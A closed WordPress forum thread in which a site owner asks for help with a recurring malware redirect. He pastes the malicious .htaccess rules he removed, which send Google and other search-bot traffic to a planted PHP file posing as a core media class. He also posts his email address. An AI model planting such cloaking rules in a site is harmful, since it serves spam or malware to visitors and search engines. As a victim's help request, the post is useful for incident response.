[closed] Re-generating backdoor in my PHP (2 posts)

  1. paulbanks05
    Posted 6 years ago #

    So after going through almost all of the steps listed here-


    I'm still showing a malware re-direct on my WP built site. It doesn't show up all time, just enough to be re-occuring enough to decimate my traffic and a re-direct to mainnetsoll.com after a clean install of WP, and removal of the infected

    -htaccess file, which looked like this:

    RewriteEngine on

    RewriteBase /

    RewriteCond %{HTTP_HOST} (^|www.)thesportsbank.net

    RewriteCond %{REQUEST_FILENAME} ![^a-zA-Z0-9](css|js|jpe?g| gif|png|zip|swf|doc|xls|pdf| ico|tar|gz|bmp|rar|mp3|avi| mpeg|flv)(\?|$)

    RewriteCond %{REMOTE_ADDR} ^66\.249\.[6-9][0-9]\.[0-9]+$ [OR]

    RewriteCond %{REMOTE_ADDR} ^74\.125\.[0-9]+\.[0-9]+$ [OR]

    RewriteCond %{REMOTE_ADDR} ^64\.233\.1[6-9][0-9]\.[0-9]+$ [OR]

    RewriteCond %{HTTP_USER_AGENT} (google|msnbot|[Ss]lurp)

    RewriteRule ^(.*)$ core/wp-admin/includes/media. class.php [L]

    These files were also infected

    here's a description of the original attack

    It may have been on the back-end, as I was one of those WP blogs brought down on Network Solutions server on Sun. detailed here


    luckily, I purchased a new hosting package on another more secure host, and with the help of my regular programmer move everything over this weekend.

    I have a couple people on this right now, but I'm genuinely worried that this problem my be severe enough that it's beyond their expertise.

    Because we keep removing the malicious code, and yet the re-direct keeps coming back. I can provide a copy of the bad code if needs be, to help speed along the recovery process, but I may need to hire another, very advanced php programmer, know anyone? I want to get this fixed ASAP and will spend the money to do so.

    my email paulb05@hotmail.com

  2. esmi
    Forum Moderator
    Posted 6 years ago #

Topic Closed

This topic has been closed to new replies.

About this Topic